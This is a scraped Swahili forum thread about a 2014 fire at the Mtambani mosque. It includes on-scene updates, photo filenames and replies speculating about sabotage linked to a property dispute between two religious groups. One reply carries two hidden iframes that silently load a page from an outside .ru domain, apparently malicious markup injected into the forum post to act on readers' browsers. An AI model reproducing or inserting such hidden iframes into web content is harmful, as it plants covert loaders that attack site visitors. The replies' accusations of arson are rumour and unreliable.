Msikiti wa Mtambani unaungua

Msikiti wa Mtambani unaungua

Joined
Aug 12, 2011
Posts
7,150
Reaction score
14,730
Nipo eneo la tukio, hivi sasa Msikiti wa Mtambani unaungua,
hii ni mara ya pili mfululizo katika kipindi kisochozidi mwezi,
hivi karibuni uliungua sehemu ya juu ya jengo wanakosoma
watoto, lakini leo umeanzia sehemu ya chini. chanzo cha moto
bado hakijajulikana ingawa inasemekana kuwa ni shoti ya umeme.
Zimamoto bado hawajafika...

IMG_20140912_123031_0.jpg

IMG_20140912_123043_0.jpg

IMG_20140912_123219_0.jpg

IMG_20140912_123336_0.jpg
 
Duh!!! kuna mdudu gani anapita tena huko...
 
utafiti.....kusoma hujui hata picha huoni?:embarrassed::A S wink:<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>
 
Kama sio mkono wa mtu basi kuna mguu wa mtu...si bure
 
UPDATE:

Hali kwa sasa ni shwari, juhudi zinafanywa kutoa nje baadhi ya mali zilizosalimika.
Nimetoka kidogo eneo la tukio lakini nakisikia king'ora cha zimamoto kwa mbaali...

IMG_20140912_125355_0.jpg

IMG_20140912_125424_0.jpg

IMG_20140912_125432_0.jpg

IMG_20140912_125442_0.jpg
 
Wanahujumiana hao ka si visasi


Ni kweli wanahujumiana..huo msikiti ni wa Bakwata, waliwakaribisha Answar Sunna..kwamakubaliano kwamba wakae hapo kwa muda tu, ilipofika wakati wa kuurudisha jamaa wakagoma..issue ikapelekwa mahakamani, inasemekana hukumu ilikua itolewe kipindi kile cha moto wa kwanza, inaonekana jamaa wa Answar Suinna hawataki kuachia msikiti na wakiachia wanataka watie hasara..kuna vitoto vinatwanga karate pale!
 
mkuu hiyo simu yako noma picha zimetulia,poleni sana wahusika wa hapo
 
Duh, juzi tu?? Na leo tena?

Hiyo ndo dhambi ya ubaguzi. Ni kama kula nyama ya mtu kamwe huwezi kuacha.

Walianza na makanisa ya wagalatia sasa wamegeukia na misikiti ya ndugu zao.
 
Back
Top Bottom